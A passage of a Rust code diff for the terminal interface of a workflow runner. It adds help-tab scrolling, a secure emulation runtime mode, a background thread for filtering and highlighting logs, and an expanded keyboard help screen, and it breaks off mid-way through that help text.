||||
KeyCode::Char('q') => {
|
||||
// Exit and clean up
|
||||
@@ -214,6 +242,8 @@ fn run_tui_event_loop(
|
||||
} else {
|
||||
app.scroll_logs_up();
|
||||
}
|
||||
} else if app.selected_tab == 3 {
|
||||
app.scroll_help_up();
|
||||
} else if app.selected_tab == 0 {
|
||||
app.previous_workflow();
|
||||
} else if app.selected_tab == 1 {
|
||||
@@ -231,6 +261,8 @@ fn run_tui_event_loop(
|
||||
} else {
|
||||
app.scroll_logs_down();
|
||||
}
|
||||
} else if app.selected_tab == 3 {
|
||||
app.scroll_help_down();
|
||||
} else if app.selected_tab == 0 {
|
||||
app.next_workflow();
|
||||
} else if app.selected_tab == 1 {
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
// App state for the UI
|
||||
use crate::log_processor::{LogProcessingRequest, LogProcessor, ProcessedLogEntry};
|
||||
use crate::models::{
|
||||
ExecutionResultMsg, JobExecution, LogFilterLevel, StepExecution, Workflow, WorkflowExecution,
|
||||
WorkflowStatus,
|
||||
@@ -40,6 +41,15 @@ pub struct App {
|
||||
pub log_filter_level: Option<LogFilterLevel>, // Current log level filter
|
||||
pub log_search_matches: Vec<usize>, // Indices of logs that match the search
|
||||
pub log_search_match_idx: usize, // Current match index for navigation
|
||||
|
||||
// Help tab scrolling
|
||||
pub help_scroll: usize, // Scrolling position for help content
|
||||
|
||||
// Background log processing
|
||||
pub log_processor: LogProcessor,
|
||||
pub processed_logs: Vec<ProcessedLogEntry>,
|
||||
pub logs_need_update: bool, // Flag to trigger log processing
|
||||
pub last_system_logs_count: usize, // Track system log changes
|
||||
}
|
||||
|
||||
impl App {
|
||||
@@ -168,6 +178,7 @@ impl App {
|
||||
}
|
||||
}
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
};
|
||||
|
||||
App {
|
||||
@@ -199,6 +210,13 @@ impl App {
|
||||
log_filter_level: Some(LogFilterLevel::All),
|
||||
log_search_matches: Vec::new(),
|
||||
log_search_match_idx: 0,
|
||||
help_scroll: 0,
|
||||
|
||||
// Background log processing
|
||||
log_processor: LogProcessor::new(),
|
||||
processed_logs: Vec::new(),
|
||||
logs_need_update: true,
|
||||
last_system_logs_count: 0,
|
||||
}
|
||||
}
|
||||
|
||||
@@ -214,7 +232,8 @@ impl App {
|
||||
pub fn toggle_emulation_mode(&mut self) {
|
||||
self.runtime_type = match self.runtime_type {
|
||||
RuntimeType::Docker => RuntimeType::Podman,
|
||||
RuntimeType::Podman => RuntimeType::Emulation,
|
||||
RuntimeType::Podman => RuntimeType::SecureEmulation,
|
||||
RuntimeType::SecureEmulation => RuntimeType::Emulation,
|
||||
RuntimeType::Emulation => RuntimeType::Docker,
|
||||
};
|
||||
self.logs
|
||||
@@ -238,7 +257,8 @@ impl App {
|
||||
match self.runtime_type {
|
||||
RuntimeType::Docker => "Docker",
|
||||
RuntimeType::Podman => "Podman",
|
||||
RuntimeType::Emulation => "Emulation",
|
||||
RuntimeType::SecureEmulation => "Secure Emulation",
|
||||
RuntimeType::Emulation => "Emulation (Unsafe)",
|
||||
}
|
||||
}
|
||||
|
||||
@@ -429,10 +449,9 @@ impl App {
|
||||
if let Some(idx) = self.workflow_list_state.selected() {
|
||||
if idx < self.workflows.len() && !self.execution_queue.contains(&idx) {
|
||||
self.execution_queue.push(idx);
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
self.logs.push(format!(
|
||||
"[{}] Added '{}' to execution queue. Press 'Enter' to start.",
|
||||
timestamp, self.workflows[idx].name
|
||||
self.add_timestamped_log(&format!(
|
||||
"Added '{}' to execution queue. Press 'Enter' to start.",
|
||||
self.workflows[idx].name
|
||||
));
|
||||
}
|
||||
}
|
||||
@@ -635,10 +654,11 @@ impl App {
|
||||
self.log_search_active = false;
|
||||
self.log_search_query.clear();
|
||||
self.log_search_matches.clear();
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
KeyCode::Backspace => {
|
||||
self.log_search_query.pop();
|
||||
self.update_log_search_matches();
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
KeyCode::Enter => {
|
||||
self.log_search_active = false;
|
||||
@@ -646,7 +666,7 @@ impl App {
|
||||
}
|
||||
KeyCode::Char(c) => {
|
||||
self.log_search_query.push(c);
|
||||
self.update_log_search_matches();
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
@@ -658,8 +678,8 @@ impl App {
|
||||
if !self.log_search_active {
|
||||
// Don't clear the query, this allows toggling the search UI while keeping the filter
|
||||
} else {
|
||||
// When activating search, update matches
|
||||
self.update_log_search_matches();
|
||||
// When activating search, trigger update
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
}
|
||||
|
||||
@@ -670,8 +690,8 @@ impl App {
|
||||
Some(level) => Some(level.next()),
|
||||
};
|
||||
|
||||
// Update search matches when filter changes
|
||||
self.update_log_search_matches();
|
||||
// Trigger log processing update when filter changes
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
// Clear log search and filter
|
||||
@@ -680,6 +700,7 @@ impl App {
|
||||
self.log_filter_level = None;
|
||||
self.log_search_matches.clear();
|
||||
self.log_search_match_idx = 0;
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
// Update matches based on current search and filter
|
||||
@@ -790,6 +811,18 @@ impl App {
|
||||
}
|
||||
}
|
||||
|
||||
// Scroll help content up
|
||||
pub fn scroll_help_up(&mut self) {
|
||||
self.help_scroll = self.help_scroll.saturating_sub(1);
|
||||
}
|
||||
|
||||
// Scroll help content down
|
||||
pub fn scroll_help_down(&mut self) {
|
||||
// The help content has a fixed number of lines, so we set a reasonable max
|
||||
const MAX_HELP_SCROLL: usize = 30; // Adjust based on help content length
|
||||
self.help_scroll = (self.help_scroll + 1).min(MAX_HELP_SCROLL);
|
||||
}
|
||||
|
||||
// Update progress for running workflows
|
||||
pub fn update_running_workflow_progress(&mut self) {
|
||||
if let Some(idx) = self.current_execution {
|
||||
@@ -955,4 +988,82 @@ impl App {
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Request log processing update from background thread
|
||||
pub fn request_log_processing_update(&mut self) {
|
||||
let request = LogProcessingRequest {
|
||||
search_query: self.log_search_query.clone(),
|
||||
filter_level: self.log_filter_level.clone(),
|
||||
app_logs: self.logs.clone(),
|
||||
app_logs_count: self.logs.len(),
|
||||
system_logs_count: wrkflw_logging::get_logs().len(),
|
||||
};
|
||||
|
||||
if self.log_processor.request_update(request).is_err() {
|
||||
// Log processor channel disconnected, recreate it
|
||||
self.log_processor = LogProcessor::new();
|
||||
self.logs_need_update = true;
|
||||
}
|
||||
}
|
||||
|
||||
/// Check for and apply log processing updates
|
||||
pub fn check_log_processing_updates(&mut self) {
|
||||
// Check if system logs have changed
|
||||
let current_system_logs_count = wrkflw_logging::get_logs().len();
|
||||
if current_system_logs_count != self.last_system_logs_count {
|
||||
self.last_system_logs_count = current_system_logs_count;
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
if let Some(response) = self.log_processor.try_get_update() {
|
||||
self.processed_logs = response.processed_logs;
|
||||
self.log_search_matches = response.search_matches;
|
||||
|
||||
// Update scroll position to first match if we have search results
|
||||
if !self.log_search_matches.is_empty() && !self.log_search_query.is_empty() {
|
||||
self.log_search_match_idx = 0;
|
||||
if let Some(&idx) = self.log_search_matches.first() {
|
||||
self.log_scroll = idx;
|
||||
}
|
||||
}
|
||||
|
||||
self.logs_need_update = false;
|
||||
}
|
||||
}
|
||||
|
||||
/// Trigger log processing when search/filter changes
|
||||
pub fn mark_logs_for_update(&mut self) {
|
||||
self.logs_need_update = true;
|
||||
self.request_log_processing_update();
|
||||
}
|
||||
|
||||
/// Get combined app and system logs for background processing
|
||||
pub fn get_combined_logs(&self) -> Vec<String> {
|
||||
let mut all_logs = Vec::new();
|
||||
|
||||
// Add app logs
|
||||
for log in &self.logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Add system logs
|
||||
for log in wrkflw_logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
all_logs
|
||||
}
|
||||
|
||||
/// Add a log entry and trigger log processing update
|
||||
pub fn add_log(&mut self, message: String) {
|
||||
self.logs.push(message);
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
/// Add a formatted log entry with timestamp and trigger log processing update
|
||||
pub fn add_timestamped_log(&mut self, message: &str) {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
let formatted_message = format!("[{}] {}", timestamp, message);
|
||||
self.add_log(formatted_message);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -122,6 +122,7 @@ pub async fn execute_workflow_cli(
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
};
|
||||
|
||||
@@ -454,6 +455,7 @@ pub fn start_next_workflow_execution(
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
};
|
||||
|
||||
|
||||
@@ -12,6 +12,7 @@
|
||||
pub mod app;
|
||||
pub mod components;
|
||||
pub mod handlers;
|
||||
pub mod log_processor;
|
||||
pub mod models;
|
||||
pub mod utils;
|
||||
pub mod views;
|
||||
|
||||
305
crates/ui/src/log_processor.rs
Normal file
305
crates/ui/src/log_processor.rs
Normal file
@@ -0,0 +1,305 @@
|
||||
// Background log processor for asynchronous log filtering and formatting
|
||||
use crate::models::LogFilterLevel;
|
||||
use ratatui::{
|
||||
style::{Color, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Cell, Row},
|
||||
};
|
||||
use std::sync::mpsc;
|
||||
use std::thread;
|
||||
use std::time::{Duration, Instant};
|
||||
|
||||
/// Processed log entry ready for rendering
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ProcessedLogEntry {
|
||||
pub timestamp: String,
|
||||
pub log_type: String,
|
||||
pub log_style: Style,
|
||||
pub content_spans: Vec<Span<'static>>,
|
||||
}
|
||||
|
||||
impl ProcessedLogEntry {
|
||||
/// Convert to a table row for rendering
|
||||
pub fn to_row(&self) -> Row<'static> {
|
||||
Row::new(vec![
|
||||
Cell::from(self.timestamp.clone()),
|
||||
Cell::from(self.log_type.clone()).style(self.log_style),
|
||||
Cell::from(Line::from(self.content_spans.clone())),
|
||||
])
|
||||
}
|
||||
}
|
||||
|
||||
/// Request to update log processing parameters
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct LogProcessingRequest {
|
||||
pub search_query: String,
|
||||
pub filter_level: Option<LogFilterLevel>,
|
||||
pub app_logs: Vec<String>, // Complete app logs
|
||||
pub app_logs_count: usize, // To detect changes in app logs
|
||||
pub system_logs_count: usize, // To detect changes in system logs
|
||||
}
|
||||
|
||||
/// Response with processed logs
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct LogProcessingResponse {
|
||||
pub processed_logs: Vec<ProcessedLogEntry>,
|
||||
pub total_log_count: usize,
|
||||
pub filtered_count: usize,
|
||||
pub search_matches: Vec<usize>, // Indices of logs that match search
|
||||
}
|
||||
|
||||
/// Background log processor
|
||||
pub struct LogProcessor {
|
||||
request_tx: mpsc::Sender<LogProcessingRequest>,
|
||||
response_rx: mpsc::Receiver<LogProcessingResponse>,
|
||||
_worker_handle: thread::JoinHandle<()>,
|
||||
}
|
||||
|
||||
impl LogProcessor {
|
||||
/// Create a new log processor with a background worker thread
|
||||
pub fn new() -> Self {
|
||||
let (request_tx, request_rx) = mpsc::channel::<LogProcessingRequest>();
|
||||
let (response_tx, response_rx) = mpsc::channel::<LogProcessingResponse>();
|
||||
|
||||
let worker_handle = thread::spawn(move || {
|
||||
Self::worker_loop(request_rx, response_tx);
|
||||
});
|
||||
|
||||
Self {
|
||||
request_tx,
|
||||
response_rx,
|
||||
_worker_handle: worker_handle,
|
||||
}
|
||||
}
|
||||
|
||||
/// Send a processing request (non-blocking)
|
||||
pub fn request_update(
|
||||
&self,
|
||||
request: LogProcessingRequest,
|
||||
) -> Result<(), mpsc::SendError<LogProcessingRequest>> {
|
||||
self.request_tx.send(request)
|
||||
}
|
||||
|
||||
/// Try to get the latest processed logs (non-blocking)
|
||||
pub fn try_get_update(&self) -> Option<LogProcessingResponse> {
|
||||
self.response_rx.try_recv().ok()
|
||||
}
|
||||
|
||||
/// Background worker loop
|
||||
fn worker_loop(
|
||||
request_rx: mpsc::Receiver<LogProcessingRequest>,
|
||||
response_tx: mpsc::Sender<LogProcessingResponse>,
|
||||
) {
|
||||
let mut last_request: Option<LogProcessingRequest> = None;
|
||||
let mut last_processed_time = Instant::now();
|
||||
let mut cached_logs: Vec<String> = Vec::new();
|
||||
let mut cached_app_logs_count = 0;
|
||||
let mut cached_system_logs_count = 0;
|
||||
|
||||
loop {
|
||||
// Check for new requests with a timeout to allow periodic processing
|
||||
let request = match request_rx.recv_timeout(Duration::from_millis(100)) {
|
||||
Ok(req) => Some(req),
|
||||
Err(mpsc::RecvTimeoutError::Timeout) => None,
|
||||
Err(mpsc::RecvTimeoutError::Disconnected) => break,
|
||||
};
|
||||
|
||||
// Update request if we received one
|
||||
if let Some(req) = request {
|
||||
last_request = Some(req);
|
||||
}
|
||||
|
||||
// Process if we have a request and enough time has passed since last processing
|
||||
if let Some(ref req) = last_request {
|
||||
let should_process = last_processed_time.elapsed() > Duration::from_millis(50)
|
||||
&& (cached_app_logs_count != req.app_logs_count
|
||||
|| cached_system_logs_count != req.system_logs_count
|
||||
|| cached_logs.is_empty());
|
||||
|
||||
if should_process {
|
||||
// Refresh log cache if log counts changed
|
||||
if cached_app_logs_count != req.app_logs_count
|
||||
|| cached_system_logs_count != req.system_logs_count
|
||||
|| cached_logs.is_empty()
|
||||
{
|
||||
cached_logs = Self::get_combined_logs(&req.app_logs);
|
||||
cached_app_logs_count = req.app_logs_count;
|
||||
cached_system_logs_count = req.system_logs_count;
|
||||
}
|
||||
|
||||
let response = Self::process_logs(&cached_logs, req);
|
||||
|
||||
if response_tx.send(response).is_err() {
|
||||
break; // Receiver disconnected
|
||||
}
|
||||
|
||||
last_processed_time = Instant::now();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Get combined app and system logs
|
||||
fn get_combined_logs(app_logs: &[String]) -> Vec<String> {
|
||||
let mut all_logs = Vec::new();
|
||||
|
||||
// Add app logs
|
||||
for log in app_logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Add system logs
|
||||
for log in wrkflw_logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
all_logs
|
||||
}
|
||||
|
||||
/// Process logs according to search and filter criteria
|
||||
fn process_logs(all_logs: &[String], request: &LogProcessingRequest) -> LogProcessingResponse {
|
||||
// Filter logs based on search query and filter level
|
||||
let mut filtered_logs = Vec::new();
|
||||
let mut search_matches = Vec::new();
|
||||
|
||||
for (idx, log) in all_logs.iter().enumerate() {
|
||||
let passes_filter = match &request.filter_level {
|
||||
None => true,
|
||||
Some(level) => level.matches(log),
|
||||
};
|
||||
|
||||
let matches_search = if request.search_query.is_empty() {
|
||||
true
|
||||
} else {
|
||||
log.to_lowercase()
|
||||
.contains(&request.search_query.to_lowercase())
|
||||
};
|
||||
|
||||
if passes_filter && matches_search {
|
||||
filtered_logs.push((idx, log));
|
||||
if matches_search && !request.search_query.is_empty() {
|
||||
search_matches.push(filtered_logs.len() - 1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Process filtered logs into display format
|
||||
let processed_logs: Vec<ProcessedLogEntry> = filtered_logs
|
||||
.iter()
|
||||
.map(|(_, log_line)| Self::process_log_entry(log_line, &request.search_query))
|
||||
.collect();
|
||||
|
||||
LogProcessingResponse {
|
||||
processed_logs,
|
||||
total_log_count: all_logs.len(),
|
||||
filtered_count: filtered_logs.len(),
|
||||
search_matches,
|
||||
}
|
||||
}
|
||||
|
||||
/// Process a single log entry into display format
|
||||
fn process_log_entry(log_line: &str, search_query: &str) -> ProcessedLogEntry {
|
||||
// Extract timestamp from log format [HH:MM:SS]
|
||||
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let end = log_line.find(']').unwrap_or(0);
|
||||
if end > 1 {
|
||||
log_line[1..end].to_string()
|
||||
} else {
|
||||
"??:??:??".to_string()
|
||||
}
|
||||
} else {
|
||||
"??:??:??".to_string()
|
||||
};
|
||||
|
||||
// Determine log type and style
|
||||
let (log_type, log_style) =
|
||||
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
|
||||
{
|
||||
("ERROR", Style::default().fg(Color::Red))
|
||||
} else if log_line.contains("Warning")
|
||||
|| log_line.contains("warning")
|
||||
|| log_line.contains("⚠️")
|
||||
{
|
||||
("WARN", Style::default().fg(Color::Yellow))
|
||||
} else if log_line.contains("Success")
|
||||
|| log_line.contains("success")
|
||||
|| log_line.contains("✅")
|
||||
{
|
||||
("SUCCESS", Style::default().fg(Color::Green))
|
||||
} else if log_line.contains("Running")
|
||||
|| log_line.contains("running")
|
||||
|| log_line.contains("⟳")
|
||||
{
|
||||
("INFO", Style::default().fg(Color::Cyan))
|
||||
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
|
||||
("TRIG", Style::default().fg(Color::Magenta))
|
||||
} else {
|
||||
("INFO", Style::default().fg(Color::Gray))
|
||||
};
|
||||
|
||||
// Extract content after timestamp
|
||||
let content = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let start = log_line.find(']').unwrap_or(0) + 1;
|
||||
log_line[start..].trim()
|
||||
} else {
|
||||
log_line
|
||||
};
|
||||
|
||||
// Create content spans with search highlighting
|
||||
let content_spans = if !search_query.is_empty() {
|
||||
Self::highlight_search_matches(content, search_query)
|
||||
} else {
|
||||
vec![Span::raw(content.to_string())]
|
||||
};
|
||||
|
||||
ProcessedLogEntry {
|
||||
timestamp,
|
||||
log_type: log_type.to_string(),
|
||||
log_style,
|
||||
content_spans,
|
||||
}
|
||||
}
|
||||
|
||||
/// Highlight search matches in content
|
||||
fn highlight_search_matches(content: &str, search_query: &str) -> Vec<Span<'static>> {
|
||||
let mut spans = Vec::new();
|
||||
let lowercase_content = content.to_lowercase();
|
||||
let lowercase_query = search_query.to_lowercase();
|
||||
|
||||
if lowercase_content.contains(&lowercase_query) {
|
||||
let mut last_idx = 0;
|
||||
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
|
||||
let real_idx = last_idx + idx;
|
||||
|
||||
// Add text before match
|
||||
if real_idx > last_idx {
|
||||
spans.push(Span::raw(content[last_idx..real_idx].to_string()));
|
||||
}
|
||||
|
||||
// Add matched text with highlight
|
||||
let match_end = real_idx + search_query.len();
|
||||
spans.push(Span::styled(
|
||||
content[real_idx..match_end].to_string(),
|
||||
Style::default().bg(Color::Yellow).fg(Color::Black),
|
||||
));
|
||||
|
||||
last_idx = match_end;
|
||||
}
|
||||
|
||||
// Add remaining text after last match
|
||||
if last_idx < content.len() {
|
||||
spans.push(Span::raw(content[last_idx..].to_string()));
|
||||
}
|
||||
} else {
|
||||
spans.push(Span::raw(content.to_string()));
|
||||
}
|
||||
|
||||
spans
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for LogProcessor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
@@ -50,6 +50,7 @@ pub struct StepExecution {
|
||||
}
|
||||
|
||||
/// Log filter levels
|
||||
#[derive(Debug, Clone, PartialEq)]
|
||||
pub enum LogFilterLevel {
|
||||
Info,
|
||||
Warning,
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
// Help overlay rendering
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::Rect,
|
||||
layout::{Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Paragraph, Wrap},
|
||||
@@ -9,11 +9,22 @@ use ratatui::{
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the help tab
|
||||
pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect) {
|
||||
let help_text = vec![
|
||||
// Render the help tab with scroll support
|
||||
pub fn render_help_content(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
area: Rect,
|
||||
scroll_offset: usize,
|
||||
) {
|
||||
// Split the area into columns for better organization
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Horizontal)
|
||||
.constraints([Constraint::Percentage(50), Constraint::Percentage(50)].as_ref())
|
||||
.split(area);
|
||||
|
||||
// Left column content
|
||||
let left_help_text = vec![
|
||||
Line::from(Span::styled(
|
||||
"Keyboard Controls",
|
||||
"🗂 NAVIGATION",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
@@ -21,35 +32,391 @@ pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect)
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Tab",
|
||||
"Tab / Shift+Tab",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Switch between tabs"),
|
||||
]),
|
||||
// More help text would follow...
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"1-4 / w,x,l,h",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Jump to specific tab"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"↑/↓ or k/j",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Navigate lists"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Enter",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Select/View details"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Esc",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Back/Exit help"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🚀 WORKFLOW MANAGEMENT",
|
||||
Style::default()
|
||||
.fg(Color::Green)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Space",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle workflow selection"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"r",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Run selected workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"a",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Select all workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"n",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Deselect all workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Shift+R",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Reset workflow status"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"t",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Trigger remote workflow"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🔧 EXECUTION MODES",
|
||||
Style::default()
|
||||
.fg(Color::Magenta)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"e",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle emulation mode"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"v",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle validation mode"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"Runtime Modes:",
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Docker", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" - Container isolation (default)"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Podman", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" - Rootless containers"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Emulation", Style::default().fg(Color::Red)),
|
||||
Span::raw(" - Process mode (UNSAFE)"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Secure Emulation", Style::default().fg(Color::Yellow)),
|
||||
Span::raw(" - Sandboxed processes"),
|
||||
]),
|
||||
];
|
||||
|
||||
let help_widget = Paragraph::new(help_text)
|
||||
// Right column content
|
||||
let right_help_text = vec![
|
||||
Line::from(Span::styled(
|
||||
"📄 LOGS & SEARCH",
|
||||
Style::default()
|
||||
.fg(Color::Blue)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"s",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle log search"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"f",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle log filter"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"c",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Clear search & filter"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"n",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Next search match"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"↑/↓",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Scroll logs/Navigate"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"ℹ️ TAB OVERVIEW",
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"1. Workflows",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Browse & select workflows"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • View workflow files")]),
|
||||
Line::from(vec![Span::raw(" • Select multiple for batch execution")]),
|
||||
Line::from(vec![Span::raw(" • Trigger remote workflows")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"2. Execution",
|
||||
Style::default()
|
||||
.fg(Color::Green)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Monitor job progress"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • View job status and details")]),
|
||||
Line::from(vec![Span::raw(" • Enter job details with Enter")]),
|
||||
Line::from(vec![Span::raw(" • Navigate step execution")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"3. Logs",
|
||||
Style::default()
|
||||
.fg(Color::Blue)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - View execution logs"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • Search and filter logs")]),
|
||||
Line::from(vec![Span::raw(" • Real-time log streaming")]),
|
||||
Line::from(vec![Span::raw(" • Navigate search results")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"4. Help",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - This comprehensive guide"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🎯 QUICK ACTIONS",
|
||||
